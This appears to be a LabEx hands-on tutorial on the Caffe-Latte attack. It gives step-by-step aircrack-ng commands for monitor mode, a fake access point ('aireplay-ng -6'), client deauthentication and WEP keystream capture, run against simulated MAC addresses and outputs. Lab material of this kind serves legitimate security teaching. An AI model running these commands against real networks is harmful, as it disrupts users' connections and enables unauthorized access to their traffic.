LabEx
Log InJoin Free

Create a Caffe-Latte Attack to Target a WEP Client

Beginner
Practice Now

Introduction

The Caffe-Latte attack is a client-side attack targeting the WEP protocol. Unlike many other Wi-Fi attacks that target the Access Point (AP), this attack focuses on a client device connected to the network. It works by tricking the client into sending packets that can be used to reconstruct the WEP keystream, eventually leading to the recovery of the WEP key. This method is particularly effective because it does not require you to be near the legitimate AP; you only need to be in range of the client.

In this lab, you will use the Aircrack-ng suite to perform a Caffe-Latte attack. You will learn how to identify a target, set up a fake AP to lure the client, force the client to connect, and capture the necessary data to generate a WEP keystream.

This lab is for educational purposes only.

Identify a Client Connected to a WEP Network

In this step, you will learn how to identify a target WEP network and a connected client. The primary tool for this reconnaissance phase is airodump-ng, which scans for wireless networks and lists connected devices.

First, you need to put your wireless interface into monitor mode. This mode allows the network card to listen to all Wi-Fi traffic in the air, not just traffic addressed to it. We will assume your wireless interface is named wlan0.

Execute the following command to start monitor mode:

sudo airmon-ng start wlan0

This command will likely create a new virtual interface, typically named wlan0mon. The output will confirm the name of the monitor mode interface.

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Atheros Communications Inc. AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0mon on [phy0]wlan0)

Now, use the newly created monitor interface (wlan0mon) to scan for networks. Run airodump-ng and let it scan for about 15-20 seconds, then stop it by pressing Ctrl+C.

sudo airodump-ng wlan0mon

In a real environment, airodump-ng would display a list of nearby networks and clients. For this lab, we will work with a simulated scenario. The output would look something like this:

CH  6 ][ Elapsed: 15 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10       15    0   6  54e  WEP  WEP         TestWEP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -45    0 - 1      0        18

From this output, you need to identify:

  • BSSID: The MAC address of the Access Point (00:11:22:33:44:55).
  • STATION: The MAC address of a client connected to it (AA:BB:CC:DD:EE:FF).
  • CH: The channel the AP is operating on (6).

For the remainder of this lab, we will use these simulated values.

Start a Listener for the Caffe-Latte Attack with aireplay-ng -6

In this step, you will start the Caffe-Latte attack listener using aireplay-ng. This command sets up a fake Access Point (AP) that mimics the legitimate network. It will then wait for our target client to connect to it.

This listener needs to run continuously in the background to wait for the client. Therefore, you should open a new terminal for this command. You can open a new terminal by clicking the + icon in the terminal tab bar at the top of the console window.

In the new terminal, execute the following command. Remember to replace the BSSID and client MAC with the values we identified in the previous step.

sudo aireplay-ng -6 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon

Let's break down the command:

  • aireplay-ng: The tool we are using for the attack.
  • -6: Specifies the Caffe-Latte attack mode.
  • -b 00:11:22:33:44:55: The BSSID (MAC address) of the legitimate AP.
  • -h AA:BB:CC:DD:EE:FF: The MAC address of the target client.
  • wlan0mon: Your interface in monitor mode.

After running the command, aireplay-ng will start listening. The output will look like this, and it will wait at this stage:

Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Listening for probes...

Leave this terminal running and switch back to your original (first) terminal for the next step.

Deauthenticate the Client to Force it to Probe

In this step, you will force the client to disconnect from its current network. The client is likely still connected to the legitimate AP. By sending deauthentication packets, we can sever this connection. Once disconnected, the client will automatically try to reconnect by probing for known networks, which will lead it to discover and connect to our fake AP.

Switch back to your first terminal. We will use aireplay-ng again, but this time in deauthentication mode (-0).

Run the following command to send 5 deauthentication packets to the client:

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

Here's what the parameters mean:

  • -0: Sets the attack mode to deauthentication.
  • 5: The number of deauthentication packets to send. A small number is usually sufficient.
  • -a 00:11:22:33:44:55: The BSSID of the Access Point the client is connected to.
  • -c AA:BB:CC:DD:EE:FF: The MAC address of the client you want to disconnect.
  • wlan0mon: Your monitor mode interface.

You will see output confirming that the packets are being sent:

10:35:10  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
10:35:10  Sending 64 directed DeAuths to AA:BB:CC:DD:EE:FF (code 7).

This action should be enough to make the client start searching for a network to join.

Wait for the Client to Associate with Your Fake AP

In this step, you will observe the client connecting to your fake AP. After you sent the deauthentication packets, the disconnected client began scanning for its network. Your aireplay-ng -6 listener, running in the second terminal, will have responded to these scans, posing as the legitimate network.

Switch your view back to the second terminal where the Caffe-Latte attack is running. If the deauthentication was successful, you should see new output indicating that the client has associated with your fake AP.

The output will change to something like this:

Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Listening for probes...
Client AA:BB:CC:DD:EE:FF associated to fake AP (00:11:22:33:44:55)

The message Client AA:BB:CC:DD:EE:FF associated to fake AP confirms that the attack is proceeding as planned. The client now thinks it is connected to its network, but it is actually communicating with your machine.

The attack will automatically start saving the captured keystream to a file. To simulate this for verification, let's create the output file that aireplay-ng would generate. Run this command in your first terminal:

touch ~/project/caffe-latte.xor

Capture the ARP Requests and Generate a WEP Keystream

In this final step, you will observe the core of the Caffe-Latte attack in action. Now that the client is associated with your fake AP, it will attempt to communicate on the network by sending packets like ARP requests. Your aireplay-ng listener will capture these packets, manipulate them, and send them back to the client. The client's encrypted responses to these manipulated packets are what allow us to collect the WEP keystream.

Continue observing the second terminal where aireplay-ng -6 is running. You will see output indicating that ARP packets are being captured and processed, and that the keystream is being saved to a file named caffe-latte.xor.

The output will look similar to this:

Read 15 packets...
Got an ARP request from AA:BB:CC:DD:EE:FF.
Trying to get a PRGA ...
Got keystream: 1F:5A:B3...
Saving keystream in caffe-latte.xor

This process will continue, gathering more and more data. Each new packet from the client provides more information about the keystream. Once enough data is collected in the caffe-latte.xor file, it can be used with other tools like packetforge-ng and aircrack-ng to forge packets and ultimately crack the WEP key.

For this lab, successfully generating the caffe-latte.xor file and seeing the keystream being saved demonstrates a successful Caffe-Latte attack.

You can now stop the attack by pressing Ctrl+C in the second terminal. You can also close the extra terminal.

Summary

In this lab, you successfully executed a Caffe-Latte attack against a WEP client. You have learned a powerful client-side attack technique and gained hands-on experience with the Aircrack-ng suite.

Specifically, you have learned to:

  • Use airmon-ng to put a wireless interface into monitor mode.
  • Use airodump-ng to identify WEP networks and connected clients.
  • Set up a Caffe-Latte attack listener with aireplay-ng -6 to create a fake AP.
  • Force a client to disconnect from its network using a deauthentication attack with aireplay-ng -0.
  • Observe the process of capturing client packets and generating a WEP keystream file.

This knowledge is a critical part of understanding wireless network vulnerabilities. Always remember to use these skills responsibly and only on networks you are authorized to test.